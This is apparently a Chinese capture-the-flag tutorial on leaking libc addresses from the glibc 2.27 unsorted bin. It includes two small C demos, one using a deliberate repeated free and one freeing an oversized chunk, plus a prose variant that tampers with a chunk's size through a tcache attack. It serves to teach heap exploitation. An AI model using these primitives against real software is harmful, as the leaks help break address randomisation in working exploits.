CTF-Pwn-2.27版本unsorted_bin_libc_leak若干方法
1、存在 UAF/double free 漏洞时,直接对同一个堆块多次 free:对 0xa0 大小的 chunk 连续 free 8 次,前 7 次只是填满对应的 tcache bin,第 8 次因为 size 超出 fastbin 范围(默认 0x80)而进入 unsorted bin,此时 chunk 的 fd 指向 main_arena,即 libc 地址,从而达到 libc leak(要求该 chunk 与 top chunk 之间有别的 chunk 隔开,否则会被合并进 top)。
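#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Method 1: leak a libc address through a double free (glibc 2.27).
 *
 * malloc(0x91) yields a 0xa0-byte chunk. The tcache bin for that size
 * holds at most 7 entries, so the first seven free() calls on the same
 * chunk only fill the bin; the eighth free() takes the regular path and,
 * because 0xa0 is above the default fastbin limit (0x80), the chunk is
 * linked into the unsorted bin. Its fd (user offset 0) then points into
 * main_arena, i.e. a libc address. The malloc(0x18) guard chunk keeps the
 * freed chunk from bordering the top chunk; otherwise free() would
 * consolidate it into top instead of binning it.
 *
 * The repeated free() on one pointer is deliberate: it is the
 * vulnerability being modelled, not a bug in the demo.
 * NOTE(review): 2.27 builds that backported the tcache double-free "key"
 * check (introduced upstream in 2.29) abort on the second free; this only
 * works against an unpatched 2.27 libc -- confirm the target's version.
 */
int main(void)
{
    /* Unbuffered stdio so output appears while the process is parked in getchar(). */
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    unsigned long *ptr = malloc(0x91);  /* 0xa0 chunk: tcache-sized, not fastbin-sized */
    if (ptr == NULL) {
        return 1;
    }
    malloc(0x18);                       /* guard chunk between ptr and top (intentionally leaked) */

    /* Seven frees fill the 0xa0 tcache bin (intentional double free). */
    for (int i = 0; i < 7; i++) {
        free(ptr);
    }
    /* Eighth free: tcache bin is full, so the chunk goes to the unsorted bin. */
    free(ptr);

    /* pid is printed so the heap can be inspected in a debugger while blocked below. */
    printf("pid = %d\n", getpid());
    /* fd of the unsorted-bin chunk, read through the dangling pointer.
     * %p requires a void *, so convert rather than pass the integer directly. */
    printf("fd = %p\n", (void *)(uintptr_t)ptr[0]);
    getchar();
    return 0;
}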
2、free 一个超出 tcache 范围的大堆块(chunk size > 0x410,即 malloc 请求大于 0x408;例中 malloc(0x420) 得到 0x430 的 chunk):这种 chunk 既不进 tcache 也不进 fastbin,只要它不与 top chunk 相邻,一次 free 就直接进入 unsorted bin,不需要 double free。
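#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Method 2: leak a libc address by freeing a chunk too large for tcache.
 *
 * malloc(0x420) yields a 0x430-byte chunk, above the tcache limit (0x410
 * chunk size) and above the fastbin limit, so a single free() sends it
 * straight to the unsorted bin -- no double free is needed. The
 * malloc(0x20) guard chunk keeps it from bordering top (which would make
 * free() consolidate it instead of binning it). After the free, the
 * chunk's fd (user offset 0) points into main_arena, a libc address.
 */
int main(void)
{
    /* Unbuffered stdio so output appears while the process is parked in getchar(). */
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    /* pid first so the heap can be inspected in a debugger while blocked below. */
    printf("pid = %d\n", getpid());

    long long *ptr = malloc(0x420);     /* 0x430 chunk: beyond both tcache and fastbin */
    if (ptr == NULL) {
        return 1;
    }
    malloc(0x20);                       /* guard chunk between ptr and top (intentionally leaked) */

    /* This chunk is not tcache-sized, so the old "tcache address" label was
     * misleading; print the user pointer as a void * (what %p requires). */
    printf("chunk address:%p\n", (void *)ptr);

    free(ptr);
    /* The leak itself: unsorted-bin fd read through the dangling pointer. */
    printf("fd = %p\n", (void *)(uintptr_t)ptr[0]);
    getchar();
    return 0;
}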
[变式]3、若存在 UAF 和 double free,可以先用 tcache 攻击修改可控堆块的 size,再对改过 size 的堆块 free 8 次即可 libc leak。注意改后的 size 要大于 fastbin 范围(> 0x80)且不超过 tcache 范围(≤ 0x410),否则第 8 次 free 会进 fastbin 而不是 unsorted bin;同时该 chunk 后面的 next chunk 的 size 字段和 prev_inuse 位必须合法,否则 free 会因 "invalid next size" 一类的检查而 abort。